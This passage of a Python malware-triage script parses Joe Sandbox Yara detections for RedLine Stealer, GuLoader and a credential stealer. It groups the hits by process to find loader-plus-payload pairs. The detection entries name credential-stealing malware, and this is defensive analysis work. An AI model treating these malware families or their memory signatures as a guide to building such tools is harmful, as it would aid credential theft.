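• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, Author: Joe Security
"""


def parse_dump_name(name):
    """Split a .sdmp name into its fields and decode the protection value."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    proc, stage, seq, addr, prot, mtype = m.groups()
    prot_val = int(prot, 16)
    return {
        "process": int(proc, 16), "stage": int(stage, 16), "sequence": int(seq),
        "address": int(addr, 16), "protection": prot_val,
        "protection_name": PAGE_PROTECT.get(prot_val & 0xFF, f"0x{prot_val:X}"),
        # PAGE_EXECUTE* flags live in the 0x10/0x20/0x40 bits.
        "executable": bool(prot_val & 0x70), "mem_type": int(mtype, 16),
    }


def parse_report(text):
    """Turn the 'General' blocks into dicts; each Yara bullet becomes a match entry."""
    processes, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            current = {"matches": []}
            processes.append(current)
        elif current is None or not line:
            continue
        elif line.startswith("•"):
            m = MATCH_RE.search(line)
            if m:
                rule, desc, src, author = m.groups()
                current["matches"].append({"rule": rule, "description": desc,
                                           "author": author, "dump": parse_dump_name(src)})
        elif ":" in line:
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
    return processes


def families_by_process(processes):
    """Per process index: the rules that hit and the hits inside executable regions."""
    summary = defaultdict(lambda: {"rules": set(), "rwx_hits": []})
    for proc in processes:
        for match in proc["matches"]:
            d = match["dump"]
            entry = summary[d["process"]]
            entry["rules"].add(match["rule"])
            if d["executable"]:
                entry["rwx_hits"].append((match["rule"], d["address"], d["protection_name"]))
    return dict(summary)


def loader_and_payload(processes, loader="GuLoader", payload="RedLine"):
    """Process indices whose memory carries both loader and payload signatures."""
    return [idx for idx, e in sorted(families_by_process(processes).items())
            if any(loader in r for r in e["rules"]) and any(payload in r for r in e["rules"])]


if __name__ == "__main__":
    procs = parse_report(REPORT)
    for idx, e in sorted(families_by_process(procs).items()):
        print(f"process {idx:#x}: {sorted(e['rules'])}")
        for rule, addr, prot in e["rwx_hits"]:
            print(f"  {rule} in {prot} region at {addr:#x}")
    print("loader+payload in same process:", loader_and_payload(procs))
```

The interesting signal is not any single Yara hit but the combination: a process whose stage-0 dump is executable loader code and whose later dumps are the decrypted .NET stealer. Feeding a full report into `parse_report` will list every such process, which is a quicker triage step than reading the blocks one by one.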

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis
